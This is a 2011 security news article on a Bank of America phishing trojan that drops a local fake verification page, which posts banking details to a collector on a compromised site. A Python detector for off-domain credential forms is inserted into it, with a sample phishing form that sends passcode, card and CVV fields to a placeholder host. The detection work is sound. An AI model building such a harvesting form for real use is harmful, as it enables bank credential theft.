Feb 2, 2011 15:06 GMT

A new phishing attack targeting Bank of America customers spreads a trojan that opens a local spoofed page asking for personal and banking details.

The attack, analyzed by security researchers from Sophos, generates email purporting to come from Bank of America and urging users to verify their billing information.

Unlike traditional phishing emails, which advertise a link to a spoofed page or at least carry an attached HTML document, this attack opted for an executable attachment called BillingVerification.exe.

This is unusual, because .exe files attached to email messages are much easier for anti-spam filters and antivirus programs to detect than rogue links.

Nevertheless, the executable is a self-extracting archive that drops a file at C:\bankofamerica\verification\BillingVerification.html and opens it in the default browser.

The local HTML displays a fake Bank of America account verification page which contains a form for inputting personal information, as well as account and online banking details.

Fraser Howard, a principal virus researcher at SophosLabs, points out that one interesting aspect of this attack is that the form sends the information to a collector script hosted on a compromised legitimate website.

Furthermore, since the directory where the script is located was left unprotected, anyone can go in and copy the cache of stolen information.
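As an added illustration (not code from Sophos or this article), the following Python check flags a locally dropped HTML page whose form submits sensitive-looking fields to a host outside the bank's own domain, which is the pattern this trojan uses. The sample page, its field names and the collector URL are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Substrings that mark a field as credential/account data (constructed list, not from the article)
SENSITIVE_HINTS = ("pass", "pin", "ssn", "account", "card", "cvv", "onlineid")


class FormScanner(HTMLParser):
    """Collect each <form>'s action URL and the names of its <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action", ""), "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append((a.get("name") or "").lower())


def find_exfil_forms(html_text, trusted_domains):
    """Return (action, suspicious_fields) for every form that posts sensitive-looking
    fields to a host that is not the brand's own domain. A relative action has no host
    and is treated as untrusted too: on a page opened from disk it cannot reach the bank."""
    scanner = FormScanner()
    scanner.feed(html_text)
    findings = []
    for form in scanner.forms:
        host = urlparse(form["action"]).hostname or ""
        trusted = any(host == d or host.endswith("." + d) for d in trusted_domains)
        hits = [f for f in form["fields"] if any(h in f for h in SENSITIVE_HINTS)]
        if hits and not trusted:
            findings.append((form["action"], hits))
    return findings


# Constructed sample mimicking the dropped verification page; the collector URL is a placeholder.
SAMPLE_PAGE = """
<html><body><h1>Bank of America - Billing Verification</h1>
<form method="post" action="http://compromised-site.example/images/collect.php">
  <input name="OnlineID"><input name="Passcode" type="password">
  <input name="AccountNumber"><input name="CardNumber"><input name="CVV2">
  <input type="submit" value="Verify">
</form></body></html>
"""

if __name__ == "__main__":
    for action, fields in find_exfil_forms(SAMPLE_PAGE, ["bankofamerica.com"]):
        print(f"credential form posting off-brand to {action}: {fields}")
```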

"And there it is, a warning to us all. Even the lamest of attacks will often find success, tricking unwitting recipients into falling for the social engineering. The result is that they risk infecting themselves, as well as giving away sensitive data," Mr. Howard notes.

The use of compromised legitimate websites in online attacks has become increasingly common, because it is convenient for cybercriminals. First of all, it keeps operational costs down, removing the need to register new domains all the time as security researchers get them shut down.

Second, a legitimate website cannot be shut down as easily, since the owner might lose business because of it. Trying to contact the webmasters and convince them to fix the problem is usually the only option for researchers, and one that is very inefficient in practice.